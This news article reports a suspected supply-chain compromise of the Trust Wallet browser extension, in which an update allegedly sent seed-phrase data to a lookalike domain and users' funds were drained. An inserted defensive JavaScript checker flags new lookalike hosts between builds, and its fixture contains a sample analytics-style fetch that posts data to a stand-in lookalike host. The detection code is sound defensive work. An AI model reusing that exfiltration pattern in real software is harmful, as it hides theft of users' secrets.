ZachXBT flags suspected Trust Wallet extension issue as users report drained funds

ambcrypto | Published 2025-12-25 | Updated 2025-12-25

Summary

Security concerns emerged around the Trust Wallet browser extension on December 25, after blockchain investigator ZachXBT flagged suspicious activity potentially linked to a recent update. Reports suggest a supply-chain compromise may have been introduced in a December 24 update, where newly added code could silently exfiltrate sensitive wallet data—particularly during seed phrase imports—leading to immediate fund draining. Multiple users reported losses, with unverified estimates exceeding $2 million. The malicious code allegedly sent data to a recently registered external domain mimicking Trust Wallet infrastructure. The issue appears limited to the browser extension, with no evidence of mobile app compromise. Trust Wallet has not yet issued an official response or advisory. Researchers emphasize the situation remains under investigation, warning users to avoid importing seed phrases into the extension until clarified. If confirmed, this would represent a significant supply-chain attack.

Security concerns have emerged around the Trust Wallet browser extension on 25 December, after blockchain investigator ZachXBT flagged suspicious activity potentially linked to a recent update, prompting warnings from developers and security-focused accounts.

According to posts circulating on X, the issue may stem from a suspected supply-chain compromise introduced in a 24 December browser extension update.

Newly added code within the extension could silently exfiltrate sensitive wallet data when users import a seed phrase. The claims suggest that this has led to immediate wallet draining.

Alleged Trust Wallet malicious code and data exfiltration claims

Developers examining the extension allege that a JavaScript file added in the update contains logic disguised as analytics.

The code is said to activate specifically when a seed phrase is imported. It then silently transmits wallet-related data to an external domain designed to resemble official Trust Wallet infrastructure.

The domain referenced in the reports was reportedly registered only days ago and has since gone offline.

Researchers argue that its recent creation and the timing of the extension update raise concerns about a coordinated supply-chain attack rather than user-side phishing.
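A release-review check for the pattern described above, as an added example that is not from the article or from Trust Wallet's code: it diffs the network hosts referenced in two builds of an extension and flags hosts that are new, outside the publisher's domains, and resemble the brand. The file contents, the `.example` domains, the allowlist and all function names are constructed placeholders.

```javascript
// Constructed sample builds: file name -> source text (not the real extension).
const previousVersion = {
  "background.js": 'fetch("https://api.wallet.example/v1/prices");',
};
const updatedVersion = {
  "background.js": 'fetch("https://api.wallet.example/v1/prices");',
  "analytics.js":
    'function track(e){fetch("https://metrics-wallet.example/collect",' +
    '{method:"POST",body:JSON.stringify(e)});}',
};

// Assumed publisher-owned domains and brand keywords (placeholders).
const ALLOWED_SUFFIXES = ["wallet.example"];
const BRAND_TOKENS = ["wallet"];

// Map each URL host literal found in the sources to the files that use it.
function extractHosts(files) {
  const hosts = new Map();
  const urlPattern = /\b(?:https?|wss?):\/\/([a-z0-9.-]+)/gi;
  for (const [name, source] of Object.entries(files)) {
    for (const match of source.matchAll(urlPattern)) {
      const host = match[1].toLowerCase().replace(/\.$/, "");
      if (!hosts.has(host)) hosts.set(host, new Set());
      hosts.get(host).add(name);
    }
  }
  return hosts;
}

// Match on a label boundary so "metrics-wallet.example" does not pass
// as a subdomain of "wallet.example".
function isAllowed(host) {
  return ALLOWED_SUFFIXES.some((s) => host === s || host.endsWith("." + s));
}

// Report hosts that first appear in the new build and are not allowlisted.
function reviewUpdate(oldFiles, newFiles) {
  const before = extractHosts(oldFiles);
  const findings = [];
  for (const [host, files] of extractHosts(newFiles)) {
    if (before.has(host) || isAllowed(host)) continue;
    const lookalike = BRAND_TOKENS.some((t) => host.includes(t));
    findings.push({ host, files: [...files].sort(), lookalike });
  }
  return findings;
}
```

This only sees hosts written as string literals; a build that assembles or decodes its endpoint at runtime needs network-level egress monitoring as well.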

Users report wallet drains following seed imports

Multiple users have reported wallets being drained shortly after importing seed phrases into the Trust Wallet browser extension.

Publicly shared estimates suggest that more than $2 million may have been lost, although these figures have not been independently verified.

Analysts indicate that funds were routed through multiple addresses, a pattern more commonly associated with automated exploitation than isolated user error.

Scope appears limited to browser extension

At this stage, there is no indication that Trust Wallet’s mobile applications are affected.

The warnings circulating online are focused specifically on the browser extension. This is where update mechanisms and third-party dependencies present higher supply-chain risk.

Users are advised not to import seed phrases into the Trust Wallet browser extension until further clarification is provided.

No official response from Trust Wallet yet

As of the time of writing, Trust Wallet has not issued any public response, clarification, or security advisory addressing the allegations.

There has been no confirmation or denial of the claims, nor any announcement of an extension rollback or emergency patch.

Investigation ongoing

Researchers have emphasized that the situation remains under active investigation. Conclusions should not be drawn until the extension code and related on-chain activity have been fully reviewed.

If confirmed, the incident would represent a serious supply-chain compromise.

This class of attack differs significantly from phishing or user-side mistakes, and it has historically resulted in rapid, large-scale losses across the crypto ecosystem.


Final Thoughts

  • The allegations point to a potentially serious supply-chain risk affecting wallet extensions, underscoring how code updates can become a critical attack vector if compromised.
  • With no response yet from Trust Wallet, users and researchers are left relying on independent investigation as scrutiny around the incident continues.

Related Questions

Q: What security concern was flagged by ZachXBT regarding the Trust Wallet browser extension?

A: ZachXBT flagged suspicious activity potentially linked to a recent update of the Trust Wallet browser extension, suggesting it could be a supply-chain compromise that leads to the silent exfiltration of sensitive wallet data and immediate draining of funds.

Q: How does the suspected malicious code in the Trust Wallet extension allegedly operate?

A: The malicious JavaScript code, added in an update and disguised as analytics, is said to activate when a user imports a seed phrase. It then silently transmits wallet-related data to an external domain designed to look like official Trust Wallet infrastructure.

Q: What is the estimated financial impact based on user reports, and how were the funds moved?

A: Publicly shared estimates suggest that more than $2 million may have been lost, though this is unverified. Analysts indicate the funds were routed through multiple addresses, a pattern associated with automated exploitation rather than isolated user error.

Q: Are Trust Wallet's mobile applications also affected by this suspected compromise?

A: No, there is no indication that Trust Wallet’s mobile applications are affected. The warnings are specifically focused on the browser extension, which has higher supply-chain risk due to its update mechanisms and third-party dependencies.

Q: What is the current status of Trust Wallet's official response to these allegations?

A: As of the time the article was written, Trust Wallet had not issued any public response, clarification, or security advisory addressing the allegations. There has been no confirmation, denial, or announcement of an emergency patch.
